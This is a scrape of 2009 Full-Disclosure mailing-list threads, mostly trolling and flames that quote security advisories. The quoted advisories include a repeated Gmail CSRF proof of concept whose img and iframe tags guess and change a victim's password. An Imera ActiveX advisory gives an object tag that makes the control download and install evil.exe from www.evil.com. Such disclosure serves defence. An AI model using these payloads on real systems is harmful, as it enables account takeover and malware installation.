Re: [Full-disclosure] Apple Safari ... DoS Vulnerability
I know, its insane. It is a new trend, though, just like people registering gmail accounts just to flame and troll on FD! Its like, your credability like, goes like, ok you start like at 0, and then like, it goes like to -1, and like, then even lower like. Absolutely genius. x0x0x0x0x0x0x0x0x0x On Tue, Mar 3, 2009 at 6:28 PM, Biz Marqee biz.mar...@gmail.com wrote: This was 2 years well spent... NOT! Seriously what is with all these people popping up releasing advisories that are absolute SHIT? Is it to try and get jobs or what? On Tue, Mar 3, 2009 at :55 AM, ISecAuditors Security Advisories advisories at isecauditors.com wrote: = INTERNET SECURITY AUDITORS ALERT 2007-003 - Original release date: August 1st, 2007 - Last revised: January 11th, 2009 - Discovered by: Vicente Aguilera Diaz - Severity: 3/5 = I. VULNERABILITY - CSRF vulnerability in GMail service II. BACKGROUND - Gmail is Google's free webmail service. It comes with built-in Google search technology and over 2,600 megabytes of storage (and growing every day). You can keep all your important messages, files and pictures forever, use search to quickly and easily find anything you're looking for, and make sense of it all with a new way of viewing messages as part of conversations. III. DESCRIPTION - Cross-Site Request Forgery, also known as one click attack or session riding and abbreviated as CSRF (Sea-Surf) or XSRF, is a kind of malicious exploit of websites. Although this type of attack has similarities to cross-site scripting (XSS), cross-site scripting requires the attacker to inject unauthorized code into a website, while cross-site request forgery merely transmits unauthorized commands from a user the website trusts. GMail is vulnerable to CSRF attacks in the Change Password functionality. The only token for authenticate the user is a session cookie, and this cookie is sent automatically by the browser in every request. An attacker can create a page that includes requests to the Change password functionality of GMail and modify the passwords of the users who, being authenticated, visit the page of the attacker. The attack is facilitated since the Change Password request can be realized across the HTTP GET method instead of the POST method that is realized habitually across the Change Password form. IV. PROOF OF CONCEPT - 1. An attacker create a web page csrf-attack.html that realize many HTTP GET requests to the Change Password functionality. For example, a password cracking of 3 attempts (see OldPasswd parameter): ... img src= https://www.google.com/accounts/UpdatePasswd?service=mailhl=engroup1=OldPasswdOldPasswd=PASSWORD1Passwd=abc123PasswdAgain=abc123p=save=Save img src= https://www.google.com/accounts/UpdatePasswd?service=mailhl=engroup1=OldPasswdOldPasswd=PASSWORD2Passwd=abc123PasswdAgain=abc123p=save=Save img src= https://www.google.com/accounts/UpdatePasswd?service=mailhl=engroup1=OldPasswdOldPasswd=PASSWORD3Passwd=abc123PasswdAgain=abc123p=save=Save ... or with hidden frames: ... iframe src= https://www.google.com/accounts/UpdatePasswd?service=mailhl=engroup1=OldPasswdOldPasswd=PASSWORD1Passwd=abc123PasswdAgain=abc123p=save=Save iframe src= https://www.google.com/accounts/UpdatePasswd?service=mailhl=engroup1=OldPasswdOldPasswd=PASSWORD1Passwd=abc123PasswdAgain=abc123p=save=Save iframe src= https://www.google.com/accounts/UpdatePasswd?service=mailhl=engroup1=OldPasswdOldPasswd=PASSWORD1Passwd=abc123PasswdAgain=abc123p=save=Save ... The attacker can use deliberately a weak new password (see Passwd and PasswdAgain parameters), this way he can know if the analysed password is correct without need to modify the password of the victim user. Using weak passwords the Change Password response is: - The password you gave is incorrect. , if the analysed password is not correct. - We're sorry, but you've selected an insecure password. In order to protect the security of your account, please click Password Strength to get tips on choosing to safer password. , if the analysed password is correct and the victim password is not modified. If the attacker want to modify the password of the victim user, the waited response message is: Your new password has been saved - OK . In any case, the attacker evades the restrictions imposed by the captcha of the authentication form. 2. A user authenticated in GMail visit the csrf-attack.html page controlled by the attacker. For example, the attacker sends a mail to the victim (a GMail account) and provokes that the victim visits his page (social engineering). So, the attacker insures
Re: [Full-disclosure] Cisco Security Advisory: Cisco 7600 Series Router Session Border Controller Denial of Service Vulnerability
That is why the world should use Linksys. On Wed, Mar 4, 2009 at 11:30 AM, Cisco Systems Product Security Incident Response Team ps...@cisco.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco 7600 Series Router Session Border Controller Denial of Service Vulnerability Document ID: 109483 Advisory ID: cisco-sa-20090304-sbc http://www.cisco.com/warp/public/707/cisco-sa-20090304-sbc.shtml Revision 1.0 For Public Release 2009 March 4 1600 UTC (GMT) - - Summary === A denial of service (DoS) vulnerability exists in the Cisco Session Border Controller (SBC) for the Cisco 7600 series routers. Cisco has released free software updates that address this vulnerability. Workarounds that mitigate this vulnerability are available. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20090304-sbc.shtml Affected Products = Vulnerable Products +-- All Cisco ACE-based SBC modules running software versions prior to 3.0(2) are affected. To determine the version of the Cisco SBC software running on a system, log in to the device and issue the show version command to display the system banner. card_A/Admin# show version system image file: [LCP] disk0:c76-sbck9-mzg.3.0.1_AS3_0_00.bin output truncated Cisco SBC software version 3.0.1 is running in the device used in this example. Products Confirmed Not Vulnerable + The Cisco XR 12000 Series SBC is not vulnerable. Additionally, the Cisco ACE Module, Cisco ACE 4710 Application Control Engine, Cisco ACE XML Gateway, Cisco ACE Web Application Firewall, and the Cisco ACE GSS (Global Site Selector) 4400 Series are not affected by this vulnerability. No other Cisco products are currently known to be affected by this vulnerability. Details === The Session Border Controller (SBC) enables direct IP-to-IP interconnect between multiple administrative domains for session-based services providing protocol interworking, security, and admission control and management. The SBC is a multimedia device that sits on the border of a network and controls call admission to that network. A vulnerability exists in the Cisco SBC where an unauthenticated attacker may cause the Cisco SBC card to reload by sending crafted TCP packets over port 2000. Repeated exploitation could result in a sustained DoS condition. Note: Only the Cisco SBC module reloads after successful exploitation. The Cisco 7600 series router does not reload and it is not affected by this vulnerability. Note: TCP port 2000 is typically used by Skinny Call Control Protocol (SCCP) applications. However, the Cisco SBC module uses TCP port 2000 for high availability (redundancy) communication, but does not use the SCCP for this purpose. This vulnerability is documented in Cisco Bug IDs CSCsq18958 ( registered customers only) ; and has been assigned the Common Vulnerability and Exposures (CVE) IDs CVE-2009-0619. Vulnerability Scoring Details = Cisco has provided scores for the vulnerability in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact- None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact == Successful exploitation of the vulnerability may cause a reload of the affected device. Repeated exploitation could result in a sustained DoS condition. Software Versions and Fixes === This vulnerability has been corrected in Cisco SBC software release 3.0(2). Cisco SBC software can be downloaded from: http://www.cisco.com/pcgi-bin/tablebuild.pl/sbc-7600-crypto When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete
Re: [Full-disclosure] Imera ImeraIEPlugin ActiveX Control Remote Code Execution
That is why most of them are submitted to bugtraq (ew), and not FD, where
they are often discredited in various ways. You see, bugtraq will reject 4
out of 7 postings if your not a subscriber to their super fun security
package, which offers lots of enjoyment of white hat and hacking zone-h
labs. On this ridiculus list, its hard not to get your post through! Kazaa!
On Wed, Mar 4, 2009 at 3:51 AM, bob jones bhold...@gmail.com wrote:
doesn't submitting lame bugs in useless apps ever get old?
On Tue, Mar 3, 2009 at 9:12 AM, Elazar Broad ela...@hushmail.com wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Who:
Imera(http://www.imera.com)
Imera TeamLinks Client(http://teamlinks.imera.com/install.html)
What:
ImeraIEPlugin.dll
Version 1.0.2.54
Dated 12/02/2008
{75CC8584-86D4-4A50-B976-AA72618322C6}
http://teamlinks.imera.com/ImeraIEPlugin.cab
How:
This control is used to install the Imera TeamLinks Client
package. The control fails to validate the content that it is to
download and install is indeed the Imera TeamLinks Client software.
Exploiting this issue is quite simple, like so:
object classid=clsid:75CC8584-86D4-4A50-B976-AA72618322C6
id=obj
param name=DownloadProtocol value=http /
param name=DownloadHost value=www.evil.com /
param name=DownloadPort value=80 /
param name=DownloadURI value=evil.exe /
/object
Fix:
The vendor has been notified.
Workaround:
Set the killbit for the affected control, see
http://support.microsoft.com/kb/240797.
Use the Java installer for TeamLinks Client or install the software
manually from: http://teamlinks.imera.com/download.html
Elazar
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0
wpwEAQECAAYFAkmtR6YACgkQi04xwClgpZgbTgP/T3l+Gj+pIt19H80tiHrlbpbB7+qh
/03/vQYTEL75n0XCmfGjbcurLhWlo+m90eDQwlgigq3CoQyqleKNI8kSDYjr2pw289Pm
qC21ASe/P3zIM+gt81+iqDtKMA/MGvOE20nrHVEWlatAlCgmSjt3MJhqEJ/GdzUiR22s
BDrpVM8=
=R0h3
-END PGP SIGNATURE-
--
Thinking of a life with religion? Click here to find a religious school
near you.
http://tagline.hushmail.com/fc/BLSrjkqkOt2ULsSphoguIMPooi9T2eJVBhBNEJeyTxDH8nsQ8r6djRRztwU/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Zabbix 1.6.2 Frontend Multiple Vulnerabilities
All bugs are worth something! Not. On Wed, Mar 4, 2009 at 11:23 AM, valdis.kletni...@vt.edu wrote: On Wed, 04 Mar 2009 09:13:40 EST, bobby.mug...@hushmail.com said: Is the remark about Italia meant as an excuse for stupidity? Racism is not acceptable on this list. Oddly enough, I read it as Italians believe in creating enough jobs so everybody is employed. Here in the US, the same effect can usually be observed at any Dept of Public Works project site - one guy with a jackhammer, 3 guys with the slow/stop traffic signs, several project supervisors, and another 4 or 5 guys with no obvious function there at all... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apple Safari ... DoS Vulnerability
Ah, probably not. Your stringing together words to make sentences is what I'll regret reading. I'll continue to use my muscle milk and you'll continue to work your 9-5. The world turns once again! On Wed, Mar 4, 2009 at 4:06 PM, Valdis' Mustache security.musta...@gmail.com wrote: Mister Snarks, I've never been anything but who I purport to be, the humble upper facial hair quadrant of a loquacious sysadmin. Low of birth, though noble in aspiration, a student of history and of the many mustaches who came before myself. You, young scholar, should be wary, though! Prospective employers do make regular use of search engines, googling potential candidates to gain insight into possible character flaws! True, your clean and jerk abilities as archived on the YouTube are admirable, but acting a fool on security lists is something normally reserved only for those in academia, who are markedly difficult if not impossible to unseat from their comfortable chairs, as indisputably underscored by the e-antics of this mutache's owner, and, of course, Mssr. Schmehl. You'll come to regret your lack of anonymity, as your posts will live on for eternity, much as I've came to regret my unfortunate association with the unruly beardlike growth connecting to me from the south, and my unavoidable tenuous connection with those objectionable and uncouth sideburns. Your humble servant, I baffi di Valdis On Wed, Mar 4, 2009 at 12:55 PM, Jason Starks jstarks...@gmail.com wrote: I know, its insane. It is a new trend, though, just like people registering gmail accounts just to flame and troll on FD! Its like, your credability like, goes like, ok you start like at 0, and then like, it goes like to -1, and like, then even lower like. Absolutely genius. x0x0x0x0x0x0x0x0x0x On Tue, Mar 3, 2009 at 6:28 PM, Biz Marqee biz.mar...@gmail.com wrote: This was 2 years well spent... NOT! Seriously what is with all these people popping up releasing advisories that are absolute SHIT? Is it to try and get jobs or what? On Tue, Mar 3, 2009 at :55 AM, ISecAuditors Security Advisories advisories at isecauditors.com wrote: = INTERNET SECURITY AUDITORS ALERT 2007-003 - Original release date: August 1st, 2007 - Last revised: January 11th, 2009 - Discovered by: Vicente Aguilera Diaz - Severity: 3/5 = I. VULNERABILITY - CSRF vulnerability in GMail service II. BACKGROUND - Gmail is Google's free webmail service. It comes with built-in Google search technology and over 2,600 megabytes of storage (and growing every day). You can keep all your important messages, files and pictures forever, use search to quickly and easily find anything you're looking for, and make sense of it all with a new way of viewing messages as part of conversations. III. DESCRIPTION - Cross-Site Request Forgery, also known as one click attack or session riding and abbreviated as CSRF (Sea-Surf) or XSRF, is a kind of malicious exploit of websites. Although this type of attack has similarities to cross-site scripting (XSS), cross-site scripting requires the attacker to inject unauthorized code into a website, while cross-site request forgery merely transmits unauthorized commands from a user the website trusts. GMail is vulnerable to CSRF attacks in the Change Password functionality. The only token for authenticate the user is a session cookie, and this cookie is sent automatically by the browser in every request. An attacker can create a page that includes requests to the Change password functionality of GMail and modify the passwords of the users who, being authenticated, visit the page of the attacker. The attack is facilitated since the Change Password request can be realized across the HTTP GET method instead of the POST method that is realized habitually across the Change Password form. IV. PROOF OF CONCEPT - 1. An attacker create a web page csrf-attack.html that realize many HTTP GET requests to the Change Password functionality. For example, a password cracking of 3 attempts (see OldPasswd parameter): ... img src= https://www.google.com/accounts/UpdatePasswd?service=mailhl=engroup1=OldPasswdOldPasswd=PASSWORD1Passwd=abc123PasswdAgain=abc123p=save=Save img src= https://www.google.com/accounts/UpdatePasswd?service=mailhl=engroup1=OldPasswdOldPasswd=PASSWORD2Passwd=abc123PasswdAgain=abc123p=save=Save img src= https://www.google.com/accounts/UpdatePasswd?service=mailhl=engroup1=OldPasswdOldPasswd=PASSWORD3Passwd=abc123PasswdAgain=abc123p=save=Save ... or with hidden frames: ... iframe src= https
Re: [Full-disclosure] Apple Safari ... DoS Vulnerability
Mr. Mustache, it is obvious that I have more talent than a box of chocolates, and that you envy the sadistic nature of your fellow trolls on this list. Point blank. On Tue, Mar 3, 2009 at 6:18 AM, bobby.mug...@hushmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear Valdis, I have been able to reproduce a similar situation using Firefox under MacOSX, using different websites and a significantly larger number of tabs. Do you think these issues might be related or are they operating system specific? What model of CPU were you testing this issue under? Thanks, - -bm On Mon, 02 Mar 2009 23:41:53 -0500 Valdis' Mustache security.musta...@gmail.com wrote: I would like to point out that I have been able to create a hung state in the Firefox browser by opening 30 simultaneous tabs pointed at http://www.welcometointernet.org/lawnmower/ and adding a 31st tab viewing http://www.hotrussianbrides.com. Also, I am not amused. Your humble servant, Ze Mustache von Kletnieks On Mon, Mar 2, 2009 at 10:29 PM, bobby.mug...@hushmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear Nick, You and Thierry Loller are wrong. - -bm On Mon, 02 Mar 2009 21:28:17 -0500 Nick FitzGerald n...@virus- l.demon.co.uk wrote: Chris Evans to Thierry Zoller: Example If a chrome tab can be crashed arbritarely (remotely) it is a DoS attack but with ridiculy low impact to the end-user as it only crashes the tab it was subjected to, and not the whole browser or operation system. But the fact remains that this was the impact of a DoS condition, the tab crashes arbritarily. Eh? If you visit www.evil.com and your tab crashes, that's no different from www.evil.com closing its own tab with Javascript. But what if www.evil.com has run an injection attack of some kind (SQL, XSS in blog comments, etc, etc) against www.stupid.com? Visitors to stupid.com then suffer a DoS... Yes, stupid.com should run their site better, fix their myriad XSS holes, etc, etc. But this is the Internet, so this software flaw can be leveraged as security vulnerability. I'm with Thierry on this... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkmso8YACgkQhNp8gzZx3sj93AP/a+oFmgLbU2Elo0livpG3c6Qvh8+ 0 b69LocD4LJmaR3NR4H7AHZYJiqm1TegwdTvtgY4sZd0lXi5EKZYTJMl9tj2Pd53fxXF m 7eK5yf6oRGggrdOLyDjRkMV3bVnOppwXviMHdk8quxx8sDRxA99ZlKKUA40RXFa5eAh p UpXIZ1s= =zgqd -END PGP SIGNATURE- -- Become a medical transcriptionist at home, at your own pace. http://tagline.hushmail.com/fc/BLSrjkqfMmg6RbMKs4GE43pzNkcKJRWafc7c DXj4iASDyccuLtQA2i9f1le/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkmtEaMACgkQhNp8gzZx3shZFwQAjiE2W/WUkNHrLIu1lBRz6oeDVrkn TmV8TCcaDpsvkRmhNrKFXYObPEatdJ0po7Iul333mllga8+elMukkH15J7BwUZdGlNA5 wpE6zNx8ks6L9qS9UxklE8BErdTfUY/OF5FK4aZ92JcngL1xFTkZlDJS0lvIKGry3vju P7xAvvQ= =avqi -END PGP SIGNATURE- -- Click to find great rates on health insurance, save big, shop here. http://tagline.hushmail.com/fc/BLSrjkqeRcNd9NCXSJiZxV7gq821SXvgq2GWai39WLJo4QlOxYCnjxaqn9u/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [ISecAuditors Security Advisories] CSRF vulnerability in GMail service
That is one hell of a timeline. On Tue, Mar 3, 2009 at 5:55 AM, ISecAuditors Security Advisories advisor...@isecauditors.com wrote: = INTERNET SECURITY AUDITORS ALERT 2007-003 - Original release date: August 1st, 2007 - Last revised: January 11th, 2009 - Discovered by: Vicente Aguilera Diaz - Severity: 3/5 = I. VULNERABILITY - CSRF vulnerability in GMail service II. BACKGROUND - Gmail is Google's free webmail service. It comes with built-in Google search technology and over 2,600 megabytes of storage (and growing every day). You can keep all your important messages, files and pictures forever, use search to quickly and easily find anything you're looking for, and make sense of it all with a new way of viewing messages as part of conversations. III. DESCRIPTION - Cross-Site Request Forgery, also known as one click attack or session riding and abbreviated as CSRF (Sea-Surf) or XSRF, is a kind of malicious exploit of websites. Although this type of attack has similarities to cross-site scripting (XSS), cross-site scripting requires the attacker to inject unauthorized code into a website, while cross-site request forgery merely transmits unauthorized commands from a user the website trusts. GMail is vulnerable to CSRF attacks in the Change Password functionality. The only token for authenticate the user is a session cookie, and this cookie is sent automatically by the browser in every request. An attacker can create a page that includes requests to the Change password functionality of GMail and modify the passwords of the users who, being authenticated, visit the page of the attacker. The attack is facilitated since the Change Password request can be realized across the HTTP GET method instead of the POST method that is realized habitually across the Change Password form. IV. PROOF OF CONCEPT - 1. An attacker create a web page csrf-attack.html that realize many HTTP GET requests to the Change Password functionality. For example, a password cracking of 3 attempts (see OldPasswd parameter): ... img src= https://www.google.com/accounts/UpdatePasswd?service=mailhl=engroup1=OldPasswdOldPasswd=PASSWORD1Passwd=abc123PasswdAgain=abc123p=save=Save img src= https://www.google.com/accounts/UpdatePasswd?service=mailhl=engroup1=OldPasswdOldPasswd=PASSWORD2Passwd=abc123PasswdAgain=abc123p=save=Save img src= https://www.google.com/accounts/UpdatePasswd?service=mailhl=engroup1=OldPasswdOldPasswd=PASSWORD3Passwd=abc123PasswdAgain=abc123p=save=Save ... or with hidden frames: ... iframe src= https://www.google.com/accounts/UpdatePasswd?service=mailhl=engroup1=OldPasswdOldPasswd=PASSWORD1Passwd=abc123PasswdAgain=abc123p=save=Save iframe src= https://www.google.com/accounts/UpdatePasswd?service=mailhl=engroup1=OldPasswdOldPasswd=PASSWORD1Passwd=abc123PasswdAgain=abc123p=save=Save iframe src= https://www.google.com/accounts/UpdatePasswd?service=mailhl=engroup1=OldPasswdOldPasswd=PASSWORD1Passwd=abc123PasswdAgain=abc123p=save=Save ... The attacker can use deliberately a weak new password (see Passwd and PasswdAgain parameters), this way he can know if the analysed password is correct without need to modify the password of the victim user. Using weak passwords the Change Password response is: - The password you gave is incorrect. , if the analysed password is not correct. - We're sorry, but you've selected an insecure password. In order to protect the security of your account, please click Password Strength to get tips on choosing to safer password. , if the analysed password is correct and the victim password is not modified. If the attacker want to modify the password of the victim user, the waited response message is: Your new password has been saved - OK . In any case, the attacker evades the restrictions imposed by the captcha of the authentication form. 2. A user authenticated in GMail visit the csrf-attack.html page controlled by the attacker. For example, the attacker sends a mail to the victim (a GMail account) and provokes that the victim visits his page (social engineering). So, the attacker insures himself that the victim is authenticated. 3. The password cracking is executed transparently to the victim. V. BUSINESS IMPACT - - Selective DoS on users of the GMail service (changing user password). - Possible access to the mail of other GMail users. VI. SYSTEMS AFFECTED - Gmail service. VII. SOLUTION - No solution provided by vendor. VIII. REFERENCES - http://www.gmail.com IX. CREDITS - This vulnerability has been discovered and reported by Vicente Aguilera Diaz (vaguilera (at)
Re: [Full-disclosure] Apple Safari ... DoS Vulnerability
Mr. Mustache, There is a missing s on the end of my last name. Yours truly, Jason Bench Press Starks On Tue, Mar 3, 2009 at 5:45 PM, bobby.mug...@hushmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Mr. Stark, Adhering to the tradition of my fathers, I do not sport any facial hair and take offense to your comment, and since you're obviously lacking basic observational skills I highly doubt you're even as talented as my Cadburys, at anything. - -bm On Tue, 03 Mar 2009 11:11:35 -0500 Jason Starks jstarks...@gmail.com wrote: Mr. Mustache, it is obvious that I have more talent than a box of chocolates, and that you envy the sadistic nature of your fellow trolls on this list. Point blank. On Tue, Mar 3, 2009 at 6:18 AM, bobby.mug...@hushmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear Valdis, I have been able to reproduce a similar situation using Firefox under MacOSX, using different websites and a significantly larger number of tabs. Do you think these issues might be related or are they operating system specific? What model of CPU were you testing this issue under? Thanks, - -bm On Mon, 02 Mar 2009 23:41:53 -0500 Valdis' Mustache security.musta...@gmail.com wrote: I would like to point out that I have been able to create a hung state in the Firefox browser by opening 30 simultaneous tabs pointed at http://www.welcometointernet.org/lawnmower/ and adding a 31st tab viewing http://www.hotrussianbrides.com. Also, I am not amused. Your humble servant, Ze Mustache von Kletnieks On Mon, Mar 2, 2009 at 10:29 PM, bobby.mug...@hushmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear Nick, You and Thierry Loller are wrong. - -bm On Mon, 02 Mar 2009 21:28:17 -0500 Nick FitzGerald n...@virus- l.demon.co.uk wrote: Chris Evans to Thierry Zoller: Example If a chrome tab can be crashed arbritarely (remotely) it is a DoS attack but with ridiculy low impact to the end-user as it only crashes the tab it was subjected to, and not the whole browser or operation system. But the fact remains that this was the impact of a DoS condition, the tab crashes arbritarily. Eh? If you visit www.evil.com and your tab crashes, that's no different from www.evil.com closing its own tab with Javascript. But what if www.evil.com has run an injection attack of some kind (SQL, XSS in blog comments, etc, etc) against www.stupid.com? Visitors to stupid.com then suffer a DoS... Yes, stupid.com should run their site better, fix their myriad XSS holes, etc, etc. But this is the Internet, so this software flaw can be leveraged as security vulnerability. I'm with Thierry on this... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure- charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkmso8YACgkQhNp8gzZx3sj93AP/a+oFmgLbU2Elo0livpG3c6Qvh8 + 0 b69LocD4LJmaR3NR4H7AHZYJiqm1TegwdTvtgY4sZd0lXi5EKZYTJMl9tj2Pd53fxX F m 7eK5yf6oRGggrdOLyDjRkMV3bVnOppwXviMHdk8quxx8sDRxA99ZlKKUA40RXFa5eA h p UpXIZ1s= =zgqd -END PGP SIGNATURE- -- Become a medical transcriptionist at home, at your own pace. http://tagline.hushmail.com/fc/BLSrjkqfMmg6RbMKs4GE43pzNkcKJRWafc7 c DXj4iASDyccuLtQA2i9f1le/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure- charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkmtEaMACgkQhNp8gzZx3shZFwQAjiE2W/WUkNHrLIu1lBRz6oeDVrk n TmV8TCcaDpsvkRmhNrKFXYObPEatdJ0po7Iul333mllga8+elMukkH15J7BwUZdGlNA 5 wpE6zNx8ks6L9qS9UxklE8BErdTfUY/OF5FK4aZ92JcngL1xFTkZlDJS0lvIKGry3vj u P7xAvvQ= =avqi -END PGP SIGNATURE- -- Click to find great rates on health insurance, save big, shop here. http://tagline.hushmail.com/fc/BLSrjkqeRcNd9NCXSJiZxV7gq821SXvgq2GW ai39WLJo4QlOxYCnjxaqn9u/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE
Re: [Full-disclosure] Apple Safari ... DoS Vulnerability
Right.. On Tue, Mar 3, 2009 at 5:45 PM, bobby.mug...@hushmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Mr. Stark, There. On Tue, Mar 3, 2009 at 5:56 PM, bobby.mug...@hushmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Where? - -bm On Tue, 03 Mar 2009 17:54:51 -0500 Jason Starks jstarks...@gmail.com wrote: Mr. Mustache, There is a missing s on the end of my last name. Yours truly, Jason Bench Press Starks On Tue, Mar 3, 2009 at 5:45 PM, bobby.mug...@hushmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Mr. Stark, Adhering to the tradition of my fathers, I do not sport any facial hair and take offense to your comment, and since you're obviously lacking basic observational skills I highly doubt you're even as talented as my Cadburys, at anything. - -bm On Tue, 03 Mar 2009 11:11:35 -0500 Jason Starks jstarks...@gmail.com wrote: Mr. Mustache, it is obvious that I have more talent than a box of chocolates, and that you envy the sadistic nature of your fellow trolls on this list. Point blank. On Tue, Mar 3, 2009 at 6:18 AM, bobby.mug...@hushmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear Valdis, I have been able to reproduce a similar situation using Firefox under MacOSX, using different websites and a significantly larger number of tabs. Do you think these issues might be related or are they operating system specific? What model of CPU were you testing this issue under? Thanks, - -bm On Mon, 02 Mar 2009 23:41:53 -0500 Valdis' Mustache security.musta...@gmail.com wrote: I would like to point out that I have been able to create a hung state in the Firefox browser by opening 30 simultaneous tabs pointed at http://www.welcometointernet.org/lawnmower/ and adding a 31st tab viewing http://www.hotrussianbrides.com. Also, I am not amused. Your humble servant, Ze Mustache von Kletnieks On Mon, Mar 2, 2009 at 10:29 PM, bobby.mug...@hushmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear Nick, You and Thierry Loller are wrong. - -bm On Mon, 02 Mar 2009 21:28:17 -0500 Nick FitzGerald n...@virus- l.demon.co.uk wrote: Chris Evans to Thierry Zoller: Example If a chrome tab can be crashed arbritarely (remotely) it is a DoS attack but with ridiculy low impact to the end-user as it only crashes the tab it was subjected to, and not the whole browser or operation system. But the fact remains that this was the impact of a DoS condition, the tab crashes arbritarily. Eh? If you visit www.evil.com and your tab crashes, that's no different from www.evil.com closing its own tab with Javascript. But what if www.evil.com has run an injection attack of some kind (SQL, XSS in blog comments, etc, etc) against www.stupid.com? Visitors to stupid.com then suffer a DoS... Yes, stupid.com should run their site better, fix their myriad XSS holes, etc, etc. But this is the Internet, so this software flaw can be leveraged as security vulnerability. I'm with Thierry on this... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure- charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkmso8YACgkQhNp8gzZx3sj93AP/a+oFmgLbU2Elo0livpG3c6Qvh 8 + 0 b69LocD4LJmaR3NR4H7AHZYJiqm1TegwdTvtgY4sZd0lXi5EKZYTJMl9tj2Pd53fx X F m 7eK5yf6oRGggrdOLyDjRkMV3bVnOppwXviMHdk8quxx8sDRxA99ZlKKUA40RXFa5e A h p UpXIZ1s= =zgqd -END PGP SIGNATURE- -- Become a medical transcriptionist at home, at your own pace. http://tagline.hushmail.com/fc/BLSrjkqfMmg6RbMKs4GE43pzNkcKJRWafc 7 c DXj4iASDyccuLtQA2i9f1le/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure- charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure- charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkmtEaMACgkQhNp8gzZx3shZFwQAjiE2W/WUkNHrLIu1lBRz6oeDVr k n
